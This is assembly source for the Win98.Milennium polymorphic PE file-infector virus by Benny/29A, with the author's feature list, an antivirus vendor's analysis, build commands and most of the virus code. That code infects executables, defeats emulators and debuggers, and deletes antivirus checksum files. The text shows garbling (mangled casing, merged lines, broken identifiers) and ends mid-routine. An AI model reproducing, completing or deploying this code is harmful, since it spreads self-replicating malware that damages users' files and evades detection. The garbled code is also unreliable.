苒 苒? 苒 苒? 苒 苒?
??????
Win98.Milennium 苘苒 圻 咣 咣? 圹?
BY BENNY / 29A 苘? 苘苘 苘苘???
圹? 圹???
;
;
;
Author's Description
; ======================
;
;
I'm Very Proud to Introduce First Multifiber Virus Ever. NOT Only this is IS
; Also Multithreaded Polymorphic Compressed Armoured Win98 PE File Infector
WITH STRUCTURE SIMILAR TO Neural Nets. for Those PPL, That Doesn't Know,
What Fiber Is I CAN SAY: "There R Many Differences Between Threads and
Fibers, But this one is the most important. threads r scheduled by
Specific Operating System's AlgoriHTM, SO ITS IN 50% Up to OS, Which
Thread Will Run and Which Not. Fibers R Special Threads, That R Scheduled
Only by Your Algorithm. "I WILL EXPLAIN All Details in My Tutorial.
;
;
;
What happens on execution?
; ----------------------------
;
Virus Will:
1) Decrypt It's Body by Polymorphic Decryptor
; 2) Decompress API STRINGS
; 3) Gets module handle of kenel32.dll
; 4) Gets addresses for all needed APIs
; 5) Creates Main Thread
; I) Converts Actual Thread to Fiber
; II) Creates All Needed Fibers
Iii) Finds file
; Iv) Chex file
; V) Infects file
; Vi) loops III) - V)
; Vii) deletes TBAV CHECKSUM FILE
; Viii) Changes Directory by Dot-Dot Method
; Ix) loops iii) - VII)
;
; 6) Chex Some Flags (=> payload) and jumps to host program.
;
;
;
Main Features
; ----------------
;
Platforms: Win98 , Platforms Supportin 'Threads, Fibers and "in" Instruction.
Residency: NOPE, Direct action Only.
Stealth: No Due to Nonresidency.
Antidebuggin ': Yes, Uses Threads, Fibers and ISDebuggerpresent API.
Antiheuristix: Yes, Uses Threads, Fibers and Polymorphic Engine.
Antiantivirus: Yes, deletes TBAV Checksum File.
Fast Infection: Yes, Infects All Files in Directory Structure.
Polymorphism: yes.
Other Features: a) usin '"Memory-mapped files".
; b) no use of absolute addresses.
; c) The only way, how to detect this Virus is Check PE Header
For Suspicious Flags (New Section and Flags in Last Section)
OR Find Decryption Routine (That's Not Easy, IT's Polymorphic).
IT can't be detected by Heuristic Analyzer Due To Use of
Threads and fibers. av scanner can't trace all APIs
And can't know all of 'em. in this age. I think, this is
The Best Antiheuristic Technique.
; d) USIN 'SEH for Handlin' Expected and Unexpected Exeptions.
; e) Infects EXE, SCR, BAK, DAT AND SFX (WinRAR) FILES.
; f) Two Ways, How to Infect File: 1) append to last section
; 2) CREATE New Section
; g) SIMILAR STRUCTURE to NEURAL NETS.
; h) Unicode Support for Future Versions Of Windozes
;
;
;
PayLoad
; --------
;
; If Virus Is at Least 50th Generation of Original, IT Displays
; in Possibility 1:10 MessageBox.
;
;
;
Avp's Description
; ==================
;
This is not a dangerous paraSitic Win98 Direct action Polymorphic Virus. IT
Uses several windows apis include Only in Windows98 and WindowsNT 3.51
Service Pack 3 or Higher, And Will Not Work Under Windows95. Due To
Infection-Related Bugs, IT Also Doesn't Work Under Winnt And Win2000. SO IT
IS WIN98 Specific Virus. The Infection Mechanism Used IS A Very Tricky One -
- And a Very Stable Under Win98, Too. It Makes this Virus a Very Fast; Infector, But Several Infection Related Bugs Unhat The Virus Presence in
Non-win98 Systems. When Executed, The Virus Searches for PE EXECUTABLE FILES
; in the current directory and all the Upper Directories. During Infection The
; Virus Uses TWO Infection Ways: Increases The size of last file section for the SIZE OF Last File Section for
; ITS Code, or adds a new section called ".mdata". at Each 30 Infected File T
Virus Depending On The System Timer (in One Case of 10) Displays The
FOLLOWING Message Box:
;
; ------------------------------------------------ ---
; | Win32.Milennium by Benny / 29A |
; ------------------------------------------------ --- |
; | First Multifiber Virus Is Here, BEWARE OF ME ;-) |
; | Click Ok if u wanna run this shit .. '|
; ------------------------------------------------ ---
;
;
Technical Details
; ------------------
;
When An Infected File Is Executed, The Polymorphic Routine Will Decrypt The
Constant Virus Body. Next, The Virus Unpacks The API Names Using The API Names Using The API NAMES
FOLLOWING Scheme: Each Api Name Is Split in Words, Each Word That Appears
TWICE IS Stored in A Dictionary (for Example SetFileAttributes and
GetFileAttributes Apis Are Encoded Like this:
;
Dictionary: Set, Get, File, Attributes
ENCODING: 1, 3, 4, 2, 3, 4.
;
Any Word That Is Not in The Dictionary Is Stored "AS IS". After unpacking api
Names, IT Gets The Addresses for all the buy apis. THEN, IT CREATES A THREAD
And waits for it to finnish.
;
;
; The main trread and fibers
; ---------------------------
;
The Thread Converts Itself to a Fiber and Split The Infection Process in 7
PIECES:
;
Fiber 1 - Gets The Current Directory and Searches for the Following File; Types: * .exe, * .scr, * .sfx. The IT Gives Control To Fiber 3.
, After Receiving Back The Control, IT deletes the file (if any) antivir.dat
From the current directory and goes to the Upper Directory.
;
Fiber 2 - Checks if the code runs under a debugger and if yes, it makes the
Stack Pointer Zero. This Will Result In A Debugger Crash.
;
Fiber 3 - Gets a File from the Current Search Started In Fiber 1 and Calls
Fiber 4 To Continue. When Fiber4 Is Completed, IT Calls Fiber7 and Waits To
Receive Back The Control. Then IT CHECKS for More Files in The Current
Directory.
;
Fiber 4 - Checks if The File Size if Less Than 4GB and the Gives Control To
Fiber 5. After Fiber5 Completes, IT CHECKS It The File IS An EXE File, IF THE
Target Processor is Intel and if the file is not a dll. Also, IT PAYS
Attention to the imagebase (only files with imagebase = 400000h is infected
; - MOST Applications Are INFECTABLE From This Point of View). The IT GIVES
Control to Fiber 6 and Waits to Receive It Back.
;
Fiber 5 - Opens The Current File, Creates a Mapping Object for this File To
Make Infection Process Easier. Next, IT Calls Fiber6 and Sleeps Till IT Gets
Back the control.
;
Fiber 6 - Is Closes The Current File, RESTORES The File Time and Date and IF
Needed, Grows The Current File To Fit The Virus Code.
;
Fiber 7 - IT Calls The Main Infection Routine.
;
;
File Infection Routine
; -----------------------
;
When Infecting a File, The Virus Scans Its Imports for One of the Following
Apis: getModuleHandlea and getModuleHandlew. This will be buy by the Virus
To get the addresses of the apis needed to spread. if The host file does not; import one of the prepread.
; Virus Adds ITS Code - There's One Chance In Three To Create A New Section,
Called .mdata. Otherwise, IT INCREASES The size of the last section. Then IT
Calls it's polymorphic engine to generate an encrypted image of the Virus and Download IMAGER
The Decryptor for IT and Writes Generated Code Into The Host File.
;
;
;
Author's Notes
; ===============
;
Hmmm, Fine. Adrian Marinescu Made Excelent Work. Really. I think, He Didn't
Miss Any Important Thing Nor Any INTERNAL DETAIL. Gewd Werk Adrian!
Nevertheless, I have to note. Adrian Made Description of
Beta of Milennium. u CAN See, That Payload Writes Win32.Milennium Instead
Win98. That Time I Didn't TESTED IT WINNTS AND I EXPECTED, IT WILL BE
Win32 Compatible. Unfortunately, I Forgot, That in Is Privileged Opcode Under
Winnt (That's this bug, adrian talked about). And after Some Other
Corrections (beta deleted antivir.dat files instead anti-vir.dat), i started
To Call this Virus Win98 Compatible. However, Adrians Informators (OR
Himself) Probably Never Saw Sharp Version of Milennium. Hmm, Maybe L8r. But
This Doesn't Change Anything On Thing, That Adrian Deeply Analyzed this Virus
And That He Made Really Excelent Work. I Think ITS All.
;
;
;
Greetz
; =======
;
; All 29aers ..... Thank Ya for ALL! I Promise, I'll Do Everything
I can Ever do for 29a.
LeThalmnd ... u Have a potential, keep workin 'on yourrself!
Yesnah ......... Find Another Dolly, Babe :-)) .; adrian / gecad ... fuck off AV, JOIN 29A! X-D
;
;
;
How to build
; =============
;
; TASM32-ML -Q -M4 Mil.asm
; TLINK32-Tpe -c -x -aa -r mil.obj ,, in import32
Pewrsec.com Mil.exe
;
;
;
For who is this dedicated?
; ============================
;
This Virus Is Dedicated for Somebody. HEHE, SURPRISELY. It's Dedicated to All
Good vxerz (N0T Lamerz !!!) with greet, Next Milennium Will Be.
DON 'T Give Up !!!
;
;
;
(c) 1999 Benny / 29a.
.386p; 386 intertions
.MODEL FLAT; FLAT MODEL
INCLUDE MZ.INC; Include Some Needed Files
INCLUDE PE.IC
Include Win32API.inc
INCLUDE USEFUL.INC
EXTRN EXITPROCESS: PROC; Some Apis Needed by First Generation
EXTRN GETMODULEHANDLEA: PROC
EXTRN GETMODULEW: PROC
.DATA
DB?; for TLINK32 Compatibility
ENDS
Virus code starts here ...
.code
Start:
Pushad; push all regs
@Seh_setupframe; setup SEH FRAME
INC BYTE PTR [EDX]; ===> GP FAULT
JMP Start; Some Stuff for Dumb Emulators
SEH_FN: @seh_removeframe; Remove SEH FRAME
Popad; and pop all regs
; Stuff Above Will Fuck AV-Emulators
Push Eax; Leave Some Space for "Ret" to Host
Pushad; push all regs
Poly Decryptor Starts Here ...
@ J1: DB 3 DUP (90H)
Call @ J2
@ J2: DB 3 DUP (90H)
@ 1: POP EBP
@ J3: DB 3 DUP (90H)
@ 2: Sub EBP, Offset @ J2
@ J4: DB 3 DUP (90H)
; MOV ECX, (virus_end-encrypted 3) / 4
@ 4: DB 10111001B
DD (Virus_END-Encrypted 3) / 4
@ J5: DB 3 DUP (90H)
Lea ESI, [EBP Encrypted]
DB 10001101B @ 3: DB 10110101B
; Regmod
DD Offset Encrypted
@ J6: DB 3 DUP (90H)
Decrypt:
; xor dWord PTR [ESI], 0
DB 10000001B
@ 7: db 00110110b
Key: DD 0
@ J7: DB 3 DUP (90H)
_next_:; add esi, 4
DB 10000011B
@ 8: DB 11000110B
DB 4
@ J8: DB 3 DUP (90H)
; DEC ECX
@ 5: db 01001001b
@ J9: DB 3 DUP (90h)
; Test ECX, ECX
DB 10000101B
@ 6: DB 11001001B
JNE Decrypt
ENCRYPTED:
NFILE = 1; Some Constants for Decompress Stage
Nget = 2
NSET = 3
nmodule = 4
NHANDE = 5
ncreate = 6
NFIND = 7
nclose = 8
NVIEWOF = 9
ncurrentDirectorya = 10
Nfiber = 11
nthread = 12
ndelete = 13
NLibrary = 14
Numof_csz = 15; Number of 'EM
Call Skip_Strings
CStringz:
Module Names
CSZKERNEL32 DB 'KERNEL32', 0
CSZkernel32W dw 'k', 'e', 'r', 'n', 'e', 'L', '3', '2', 0
CSZUSER32 DB 'USER32', 0
Compressed API Names
CSZGETMODULEHANDLEA DB NGET, NMODULE, NHANDLE, 'A', 0
CSZGETMODULEHANDLEW DB NGET, NMODULE, NHANDLE, 'W', 0
CSZCReatethread DB Ncreate, Nthread, 0
CszwaitforsingleObject DB 'WaitForsingleObject', 0
CSZCloseHandle DB NClose, Nhandle, 0
CSZConvertthReadtofiber DB 'Convert', NTHREAD, 'To', NFIBER, 0
CSZCreateFiber DB Ncreate, Nfiber, 0
Cszswitchtofiber DB 'Switchto', NFIBER, 0
Cszdeletefiber DB Ndelete, Nfiber, 0
CSZGETVERSION DB NGET, 'VERSION', 0
CSZFindFirstfilea DB Nfind, 'First', Nfile, 'A', 0
CSZFindNextFilea DB Nfind, 'Next', Nfile, 'A', 0
CSZFindClose DB NFIND, NCLOSE, 0
CSZCReatefilea DB Ncreate, Nfile, 'A', 0
CSZCreateFilemappinga DB Ncreate, Nfile, 'Mappinga', 0cszmapViewoffile DB 'Map', NViewof, Nfile, 0
CSZunmapViewoffile DB 'Unmap', NViewof, Nfile, 0
CSZSETFileAttributesa DB Nset, Nfile, 'Attributesa', 0
CSZSetFilePointer DB Nset, Nfile, 'Pointer', 0
CSZSETENDOFFILE DB NSET, 'Endof', Nfile, 0
CSZSETFILETIME DB NSET, NFILE, 'TIME', 0
CSZGetcurrentDirectorya DB Nget, NCurrentDirectorya, 0
CSZSetcurrentDirectorya DB Nset, NCurrentDirectorya, 0
Cszdeletefile DB Ndelete, Nfile, 'A', 0
CSZLOADLIBRARYA DB 'LOAD', NLIBRARY, 'A', 0
CSZFREELIBRARYA DB 'Free', NLIBRARY, 0
CSZISDebuggerPresent DB 'IsdebuggerPresent', 0
DB 0FFH
SzmessageBoxa DB 'MessageBoxa', 0
Strings for payload
SZTITLE DB 'WIN98.MILENNIUM by Benny / 29A', 0
Sztext DB 'First Multifiber Virus Is Here, BEWARE OF ME! ;-)', 0DH
DB 'Click OK IF U Wanna Run this Shit ...', 0
SKIP_STRINGS:
POP ESI; GET Relative Delta Offset
MOV EBP, ESI
Sub EBP, Offset Cstringz
Lea EDI, [EBP STRINGS]
Next_ch: Lodsb; Decompressing Stage
Test Al, Al
JE COPY_B
CMP AL, 0FFH
JE end_unpacking
CMP Al, Numof_csz
JB Packed
COPY_B: Stosb
JMP next_ch
Packed: Push ESI
Lea ESI, [EBP STRING_SUBS]
MOV CL, 1
MOV DL, Al
Lodsb
Packed2: Test Al, Al
Je _inc_
Packed3: CMP CL, DL
JNE UN_PCK
p_cpy: Stosb
Lodsb
Test Al, Al
JNE P_CPY
POP ESI
JMP next_ch
UN_PCK: LODSB
Test Al, Al
JNE Packed3
_INC_: Inc ECX
JMP UN_PCK
END_UNPACKING:
StoSb; Store 0FFH Byte
Mov ECX, Offset _getmoduleHandlea - 400000H; Some params
GMHA = DWORD PTR $ - 4
Mov EBX, Offset _getmoduleHandlew - 400000H
GMHW = DWORD PTR $ - 4
Lea EDX, [EBP SZKERNEL32] Lea ESI, [EBP SZKERNEL32W]
Call MygetModuleHandle; Pseudo-neuron
Jecxz Error
XCHG EBX, ECX
Lea ESI, [EBP SZAPIS]; Params for Next
Lea EDI, [EBP DDAPIS]
Call MygetProcaddress; Pseudo-neuron
Jecxz Error
XOR EAX, EAX
Lea Edx, [EBP DWTHREADID]
Push Edx
Push EAX
Push EBP
Lea Edx, [EBP MAINTHREAD]
Push Edx
Push EAX
Push EAX
Call [EBP DDCREATHREAD]; CREATE Main Thread
MOV EBX, EAX; Wait for
XOR Eax, Eax; Thread
Dec Eax; Signalization
Push EAX
Push EBX
Call [EBP DDWAITFORSINGLEOBJECT]; ...
Push Ebx; and close handle
Call [EBP DDCLOSEHANDLE]; of main thread
Call payload; Try PayLoad
Error: Mov Eax, [EBP EntryPoint]
Add Eax, 400000H
MOV [ESP.CPUSHAD], EAX
Popad
Ret; and jump to host
; ------------------------------------------------- ------------------------------
PayLoad:
CMP BYTE PTR [EBP GENERATIONCOUNT], 30; 30th generation?
JNE END_PAYLOAD; NOPE
IN Al, 40h
And Al, 9D
Jne end_payload; chance 1:10
Lea EDX, [EBP SZUSER32]; YUP, LOAD LIBRARY
Push EDX; (user32.dll)
Call [EBP DDLOADLIBRARYA]
XCHG EAX, ECX
JECXZ END_PAYLOAD
XCHG ECX, EBX
Lea ESI, [EBP SZMESSAGEBOXA]; Get Address of
Call getProcaddress; MessageBoxa API
XCHG EAX, ECX; Error?
Jecxz end_payload; ...
Push 1000h; Pass Params
Lea Edx, [EBP SZTITLE]
Push Edx
Lea Edx, [EBP SZTEXT]
Push Edx
PUSH 0
Call Ecx; Call API
Push EBX
Call [EBP DDFREELIBRARYA]; and Unload Library
End_payload:
RET
; ------------------------------------------------- ------------------------------
MygetModuleHandle PROC; OUR getModuleHandle Function
JECXZ TRY_GMHW; TRY Unicode Version
MOV EDI, 400000H
Push Edx
_GMH_: Add ecx, edicall [ECX]
XCHG EAX, ECX
Er_GMH: RET
TRY_GMHW:; Unicode Version
MOV ECX, EBX
Jecxz er_gmh
PUSH ESI
JMP _GMH_
MygetModuleHandle Endp
; ------------------------------------------------- ------------------------------
MygetProcaddress Proc; Our GetProcaddress Function
Call getProcAddress
Test Eax, EAX; Error?
JE ER_GPA
StOSD; Store Address
@Endsz; get next api name
CMP BYTE PTR [ESI], 0FFH; END OF API NAMES?
JNE MygetProcaddress; No, Next API
Ret; Yeah, Quit
ER_GPA: XOR ECX, ECX
RET
GetProcaddress:
Pushhad
@Seh_setupframe
MOV EAX, EBX
Add eax, [eax.mz_lfanew]
MOV ECX, [eax.nt_optionalheader.oh_directoryentries.de_export.dd_size]
JECXZ Proc_address_not_found
MOV EBP, EBX
Add ebp, [eax.nt_optionalheader.oh_directoryentries.de_export.dd_virtualaddress]
Push ECX
MOV EDX, EBX
Add edx, [ebp.ed_addressofnames]
Mov ECX, [EBP.ED_NUMBEROFNAMES]]
XOR EAX, EAX
Search_for_api_name:
Mov EDI, [ESP 16]
MOV ESI, EBX
Add ESI, [EDX EAX * 4]
Next_char_in_api_name:
CMPSB
JZ matched_char_in_api_name
INC EAX
Loop search_for_api_name
POP EAX
PROC_ADDRESS_NOT_FOND:
XOR EAX, EAX
JMP End_GetProcAddress
Matched_char_in_api_name:
CMP Byte PTR [ESI-1], 0
JNE NEXT_CHAR_IN_API_NAME
POP ECX
MOV EDX, EBX
Add edx, [ebp.ed_addressofordinals]
Movzx Eax, Word PTR [EDX EAX * 2]
Check_index:
CMP EAX, [EBP.ED_NUMBEROFFUNCTION]
JAE Proc_Address_not_found
MOV EDX, EBX
Add Edx, [EBP.ED_ADDRESSOFFUNCTIONS]
Add EBX, [EDX EAX * 4]
MOV EAX, EBX
SUB EBX, EBP
CMP EBX, ECX
JB proc_address_not_found
End_getprocaddress:
@Seh_removeframe
MOV [ESP.PUSHAD_EAX], EAX
Popad
RET
MygetProcaddress Endp
; ------------------------------------------------- ------------------------------ GetProcaddressit PROC; Inputs: Eax - API Name
ECX - LPTR TO MZ HEADER
; EDX - Module Name
; OUTPUTS: EAX - RVA Pointer to IAT, 0 if Error
Pushhad
XOR EAX, EAX
Push EBP
Mov ESI, [ECX.MZ_LFANEW]
Add ESI, ECX
MOV EAX, [ESI.NT_OPTIONALHEADER.OH_DIRECTORYENTRIES.DE_IMPORT.DD_VIRTUALADDRESS]
MOV EBP, ECX
Push ECX
Movzx ECX, Word Ptr [ESI.NT_FILEHEADER.FH_NUMBEROFSECTIONS]
Movzx EBX, Word Ptr [ESI.NT_FILEHEADER.FH_SIZEOFOPTIONALHEADER]
Lea EBX, [ESI.NT_OPTIONALHEADER EBX]
Scan_sections:
Mov edx, [ebx.sh_virtualaddress]
CMP EDX, EAX
JE section_found
SUB EBX, -IMAGE_SIZEOF_SECTION_HEADER
Loop scan_sections
POP ECX
POP EAX
JMP end_getprocaddressit2
Section_found:
MOV EBX, [EBX 20]
Add EBX, EBP
POP ECX
POP EAX
Test EBX, EBX
JE end_getprocaddressit2
XOR ESI, ESI
XOR EBP, EBP
PUSH ESI
Dec EBP
GET_DLL_NAME:
POP ESI
Inc EBP
Mov EDI, [ESP 20]
MOV ECX, [EBX.ESI.ID_NAME]
Test ECX, ECX
JE end_getprocaddressit2
SUB ECX, EDX
SUB ESI, -IMAGE_SIZEOF_IMPORT_DESCRIPTOR
PUSH ESI
Lea ESI, [EBX ECX]
Next_char_from_dll:
Lodsb
Add Al, - '.'
JZ IT_NUP
SUB Al, - '.' 'a'
CMP Al, 'Z' - 'A' 1
JAE NO_UP
Add Al, -20h
NO_UP: SUB Al, -'a '
IT_nup: scaSB
JNE GET_DLL_NAME
CMP Byte PTR [EDI-1], 0
JNE next_char_from_dll
FOUND_DLL_NAME:
POP ESI
Imul EAX, EBP, Image_SIZEOF_IMPORT_DESCRIPTOR
MOV ECX, [EBX Eax.ID_ORIGINALFIRSTHUNK]
JECXZ END_GETPROCADDRESSIT2
SUB ECX, EDX
Add ECX, EBX
XOR ESI, ESI
Next_IMPORTED_NAME:
PUSH ESI
Mov EDI, [ESP 32]
MOV ESI, [ECX ESI]
Test ESI, ESI
JE end_getprocaddressit3
SUB ESI, EDX
Add ESI, EBXLODSW
Next_char:
CMPSB
JNE NEXT_STEP
CMP Byte PTR [ESI-1], 0
Je got_it
JMP next_char
Next_step:
POP ESI
SUB ESI, -4
JMP next_IMPORTED_NAME
GOT_IT: POP ESI
Imul EBP, Image_SizeOf_Import_Descriptor
Add EBX, EBP
Mov Eax, [ebx.id_firstthunk]
Add Eax, ESI
MOV [ESP 28], EAX
JMP end_getprocaddressit
End_getprocaddressit3:
POP EAX
End_getprocaddressit2:
N6: xor Eax, EAX
MOV [ESP.PUSHAD_EAX], EAX
End_getprocaddressit:
Popad
RET
GetProcaddressit Endp
; ------------------------------------------------- ------------------------------
Note: Dendrit = INPUT, AXON = OUTPUT, SYNAPSE = JUMP LINK
; ------------------------------------------------- ------------------------------
MAINTHREAD Proc Pascal Delta_Param: DWORD; Delta Offset As Dendrit
Pushhad; Store All Regs
Mov EBX, Delta_Param; Store Delta Offset
PUSH 0
Call [EBX DDCONVERTTHREADTOFIBER]; Convert Thread to Fiber
XCHG EAX, ECX
JECXZ EXIT_MAIN; Error?
MOV [EBX PFMain], ECX; Store Context
Lea ESI, [EBX NEURON_ADDRESSESSS]; Create All Needed FIBERS
Lea EDI, [EBX FIBER_ADDRESS 4]
MOV ECX, NUM_OF_NEURONS
INIT_NEURONS:
Lodsd
Push ECX
Push EBX
Add Eax, EBX
Push EAX
PUSH 0
Call [EBX DDCREATEFIBER]; CREATE FIBER
POP ECX
Test Eax, EAX
JE EXIT_MAIN
Stosd
Loop init_neurons
Push [EBX PFNEURON_MAIN]
Call [EBX DDSWITCHTOFIBER]; Switch To Main Neuron
EXIT_MAIN:
Popad
RET
MAINTHREAD ENDP
; ------------------------------------------------- ------------------------------
NEURON_MAIN Proc Pascal Delta_Param: DWORD; DELTA Offset As Dendrit
Pushhad; Store All Regs
Mov EBX, Delta_Param; Store Delta Offset
Push [EBX PFNEURON_DEBUGER]
Call [EBX DDSWITCHTOFIBER]; Dwitch to Neuronlea EDX, [EBX CURDIR]
Push Edx
PUSH MAX_PATH
Call [EBX DDGETCURRENTDIRECTORYA]; Store Current Directory
MOV ECX, 20
PATH_WALK:
Push ECX
LEA ESI, [EBX SZEXE]; Extension
MOV ECX, NUM_OF_EXTS
Process_dir:
Push ECX
MOV [EBX NFINDFILE_NAME], ESI; Dendrit
MOV [EBX NFF_SYNAPSE], OFFSET PFNEURON_MAIN; Build Synapse
Push [EBX PFNEURON_FINDFILE]
Call [EBX DDSWITCHTOFIBER]; Infect Directory
@endsz
POP ECX
Loop process_dir; Next Extension
Lea ESI, [EBX DTAVTBAV]
PUSH 0
PUSH ESI
Call [EBX DDSETFILEATTRIBUTESA]; Blank File Attributes
PUSH ESI
Call [EBX DDDELETEFILEA]; Delete TBAV CHECKSUM FILE
Lea Edx, [EBX DOTDOT]
Push Edx
Call [EBX DDSETCURRENTDIRECTORYA]; Switch to Subdirectory
POP ECX
Loop path_walk
Lea Edx, [EBX CURDIR]
Push Edx
Call [EBX DDSETCURRENTDIRECTORYA]; SWITCH Back
Push [EBX PFMain]
Call [EBX DDSWITCHTOFIBER]; Switch Back to Main Fiber
Popad
RET
NEURON_MAIN ENDP
; ------------------------------------------------- ------------------------------
Neuron_Debugger Proc Pascal Delta_Param: DWORD; DELTA Offset As Dendrit
Pushhad; Store All Regs
Mov EBX, Delta_Param; Store Delta Offset
Call [EBX DDISDEBUGERPRESENT]; Is Debugger Present?
XCHG EAX, ECX
JECXZ END_DEBUGER; NOPE, JUMP TO END
IN AL, 40H; this Will Cause Execution
XOR ESP, ESP; "xor ESP, ESP" Under TD32
End_debugger:
Push [EBX PFNEURON_MAIN]
Call [EBX DDSWITCHTOFIBER]; JUMP Back to Main Neuron
Popad
RET
NEURON_DEBUGGER ENDP
; ------------------------------------------------- ------------------------------
NEURON_FINDFILE PROC PASCAL DELTA_PARAM: DWORD; Delta Offset As dendritn_findfile:
Pushad; save all regs
Mov EBX, Delta_Param; Store Delta Offset
Mov EDX, 0; Pointer to File Name
NfindFile_name = DWORD PTR $ - 4; as dendrit
Lea Eax, [EBX WFD]; Find First File
Push EAX
Push Edx
Call [EBX DDFINDFIRSTFILEA]
XCHG EAX, ECX
JECXZ END_FINDFILE
MOV [EBX SearchHandle], ECX; Save Search Handle
Checkfile:
MOV [EBX NCF_SYNAPSE], OFFSET PFNEURON_FINDFILE; Build Synapse
Push [EBX PFNEURON_CHECKFILE]
Call [EBX DDSWITCHTOFIBER]; And Switch to Neuron
XOR EAX, EAX
CMP Al, 0
ncheckfile_ok = byte PTR $ - 1; Check Axon
JE FIND_NEXT_FILE; Check Failed?
MOV [EBX NIF_SYNAPSE], OFFSET PFNEURON_FINDFILE; Build Synapse
Push [EBX PFNEURON_INFECTFILE]
Call [EBX DDSWITCHTOFIBER]; And Switch to Neuron
Find_next_file:
Lea EDX, [EBX WFD]
Push Edx
Push [EBX SearchHandle]
Call [EBX DDFINDNEXTFILEA]; Find Next File
Test Eax, EAX
JNE CHECKFILE; R Twse More Files?
Push [EBX SearchHandle]
Call [EBX DDFINDCLOSE]; NOPE, Close Search Handle
END_FINDFILE:
Push [EBX DWTHREADID]
NFF_SYNAPSE = DWORD PTR $ - 4; Jump to Previous Neuron
Call [EBX DDSWITCHOFIBER]; (Depends on Synapse)
Popad
JMP n_findfile
Neuron_FindFile Endp
; ------------------------------------------------- ------------------------------
NEURON_CHECKFILE PROC PASCAL DELTA_PARAM: DWORD; D-OFFSET As Dendrit
n_checkfile:
Pushhad; Store All Regs
Mov EBX, Delta_Param; Store Delta Offset
MOV [EBX NCHECKFILE_OK], 0
TEST [EBX WFD.WFD_DWFILEATTRIBUTES], FILE_ATTRIBUTE_DIRECTORY
JNE END_CHECKFILE; Discard Directories
XOR EDX, EDX
MOV ECX, [EBX WFD.WFD_NFILESIZEHIGH] CMP ECX, EDX
Jne End_Checkfile; Discard Hue Files
Add dx, 4096
CMP [EBX WFD.WFD_NFILESZELOW], EDX
JB end_checkfile; Discard Small Files
MOV [EBX NOPENFILE_SIZE], ECX; Dendrit
MOV [EBX NOF_SYNAPSE], OFFSET PFNEURON_CHECKFILE; Build Synapse
Push [EBX PFNEURON_OPENFILE]
Call [EBX DDSWITCHTOFIBER]; Switch to Neuron
MOV ECX, [EBX LPFILE]
JECXZ END_CHECKFILE; MAPPED FAILED?
MOV DL, BYTE PTR [ECX.MZ_RES2]
TEST DL, DL
Jne End_Check_close; test "already infected" Mark
MOV EDX, ECX
CMP Word PTR [ECX], Image_DOS_SIGNATURE; MUST BE MZ
JNE END_CHECK_CLOSE
MOV ECX, [ECX.MZ_LFANEW]
JECXZ END_CHECK_CLOSE
MOV EAX, [EBX WFD.WFD_NFILESZELOW]
CMP EAX, ECX
JB end_check_close; Must Point Inside File
Add ECX, EDX
CMP DWORD PTR [ECX], Image_NT_SIGNATURE; MUST BE PE / 0/0
JNE END_CHECK_CLOSE
CMP Word PTR [ECX.NT_FILEHEADER.FH_MACHINE], image_file_machine_i386
JNE END_CHECK_CLOSE; MUST BE 386
Test byte PTR [ECX.NT_FILEHEADER.FH_CHARACTERISTICS], Image_FILE_EXECUTABLE_IMAGE
JE end_check_close
CMP [ECX.NT_OPTIONALHEADER.OH_IMAGEBASE], 400000H; Must Be 0x400000
JNE END_CHECK_CLOSE
XOR EAX, EAX
INC EAX
MOV [EBX NCHECKFILE_OK], Al; Axon
End_check_close:
CDQ
Inc EDX
Inc EDX
MOV [EBX NCLOSEFILE_MODE], DL; Dendrit
MOV [EBX NCLF_SYNAPSE], OFFSET PFNEURON_CHECKFILE
Push [EBX PFNEURON_CLOSEFILE]
Call [EBX DDSWITCHTOFIBER]; Switch to Neuron
END_CHECKFILE:
Push [EBX DWTHREADID]
NCF_SYNAPSE = DWORD PTR $ - 4
Call [EBX DDSWITCHTOFIBER]; Jump to Previous Neuron
Popad
JMP n_checkfile
NEURON_CHECKFILE ENDP
; ------------------------------------------------- ------------------------------ Neuron_openfile Proc Pascal Delta_Param: DWORD; DELTA Offset As Dendrit
n_openfile:
Pushhad; Store All Regs
Mov EBX, Delta_Param; Store Delta Offset
Lea ESI, [EBX WFD.WFD_SZFILENAME]
Mov EDI, 0
Nopenfile_size = DWORD PTR $ - 4; Dendrit
XOR EAX, EAX
MOV [EBX LPFILE], EAX
Push EAX
Push EAX
Push Open_EXISTING
Push EAX
MOV Al, 1
Push EAX
Ror Eax, 1
MOV ECX, EDI
JECXZ $ 4
RCR EAX, 1
Push EAX
PUSH ESI
Call [EBX DDCREATEFILEA]; OPEN FILE
INC EAX
JE end_openfile
Dec EAX
MOV [EBX HFILE], EAX
CDQ
Push Edx
Push EDI
Push Edx
Mov DL, Page_Readonly
Test EDI, EDI
JE $ 4
SHL DL, 1
Push Edx
PUSH 0
Push EAX
Call [EBX DDCREATEFILEMAPPINGA]; CREATE MAPPIN OBJECT
Test Eax, EAX
JE end_openfile2
MOV [EBX HMAPFILE], EAX
CDQ
Push EDI
Push Edx
Push Edx
MOV DL, FILE_MAP_READ
Test EDI, EDI
JE $ 4
SHR DL, 1
Push Edx
Push EAX
Call [EBX DDMAPVIEWOFFILE]; MAP View of File
MOV [EBX LPFILE], EAX
Test Eax, EAX
Jne End_openfile
END_OPENFILE3:
INC EAX
END_OPENFILE2:
MOV [EBX NCLOSEFILE_MODE], AL; AXON
Mov Eax, [NOF_SYNAPSE]
MOV [EBX NCLF_SYNAPSE], EAX; Dendrit
Push [EBX PFNEURON_CLOSEFILE]
Call [EBX DDSWITCHTOFIBER]; Switch to Neuron
END_OPENFILE:
Push [EBX DWTHREADID]
NOF_SYNAPSE = DWORD PTR $ - 4
Call [EBX DDSWITCHTOFIBER]; Switch to Previous Neuron
Popad
JMP n_openfile
NEURON_OPENFILE ENDP
; ------------------------------------------------- ------------------------------
NEURON_CLOSEFILE PROC PASCAL DELTA_PARAM: DWORD
Delta Offset As Dendrit
n_closefile:
Pushhad; Store All Regs
Mov EBX, Delta_Param; Store delta Offsetmov ESI, [EBX HFILE]
XOR EDI, EDI
XOR ECX, ECX
MOV CL, 0
nclosefile_mode = byte PTR $ - 1; Dendrit
Jecxz closefile
CMP CL, 1
Je Closemap
CMP CL, 2
JE unmapfile
CMP Al, 3
Je next_edi
Inc EDI
Next_edi:
Inc EDI
Unmapfile:
Push [EBX LPFILE]
Call [EBX DDUNMAPVIEWOFFILE]; Unmap View Of File
Closemap:
Push [EBX HMAPFile]
Call [EBX DDCLOSEHANDLE]; Close Mappin Object
Test EDI, EDI
JE Closefile
CMP EDI, 1
JE set_time
XOR EAX, EAX
Push EAX
Push EAX
Push [EBX WFD.WFD_NFILESZELOW]
PUSH ESI
Call [EBX DDSETFILEPOINTER]; Set File Pointer API
PUSH ESI
